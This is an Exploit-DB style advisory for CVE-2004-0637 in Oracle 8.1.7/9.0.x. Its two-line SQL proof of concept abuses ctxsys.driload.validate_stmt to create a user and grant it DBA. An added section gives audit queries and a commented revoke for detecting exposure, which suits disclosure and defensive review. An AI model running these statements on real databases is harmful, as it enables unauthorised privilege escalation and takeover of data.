Oracle Database Server 8.1.7/9.0.x ctxsys.driload Access Validation Vulnerability

2004-09-03T00:00:00
ID EDB-ID:24567
Type exploitdb
Reporter Alexander Kornbrust
Modified 2004-09-03T00:00:00

Description

Oracle Database Server 8.1.7/9.0.x ctxsys.driload Access Validation Vulnerability. CVE-2004-0637. Remote exploit for multiple platforms.

source: http://www.securityfocus.com/bid/11099/info

Oracle Database Server is prone to an access validation vulnerability that may permit unprivileged users to execute commands as the DBA. This could compromise the database.

SQL> exec ctxsys.driload.validate_stmt('create user hacker identified by hacker');
SQL> exec ctxsys.driload.validate_stmt('grant dba, connect to hacker');
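
An audit a DBA can run to check exposure to the issue described above. This is an added example, not part of the original advisory; it assumes the package is reachable through an EXECUTE grant to PUBLIC or another non-administrative grantee (the page does not say how the grant is configured), and the commented REVOKE is an assumed containment step rather than the vendor's documented fix.

```sql
-- Added audit example (not from the original advisory). Run as a DBA.
-- Old-style joins are used so the queries also parse on 8.1.7.

-- 1. Who can execute CTXSYS.DRILOAD? A row for PUBLIC, or for any
--    non-administrative account or role, means unprivileged sessions
--    can call validate_stmt.
SELECT grantee, privilege, grantable
FROM   dba_tab_privs
WHERE  owner      = 'CTXSYS'
AND    table_name = 'DRILOAD'
ORDER  BY grantee;

-- 2. Accounts holding the DBA role, newest first. An account created
--    outside a change window and already holding DBA matches the
--    pattern shown in the proof of concept.
SELECT u.username, u.created, u.account_status, r.admin_option
FROM   dba_role_privs r, dba_users u
WHERE  u.username     = r.grantee
AND    r.granted_role = 'DBA'
ORDER  BY u.created DESC;

-- 3. Roles granted directly to recently created accounts (30 days is
--    an arbitrary review window; adjust to your retention).
SELECT u.username, u.created, r.granted_role
FROM   dba_users u, dba_role_privs r
WHERE  r.grantee = u.username
AND    u.created > SYSDATE - 30
ORDER  BY u.created DESC, r.granted_role;

-- 4. Assumed containment if query 1 lists PUBLIC. Confirm against
--    Oracle's guidance for CVE-2004-0637 and test the CTXSYS-owned
--    text features before applying in production.
-- REVOKE EXECUTE ON ctxsys.driload FROM PUBLIC;
```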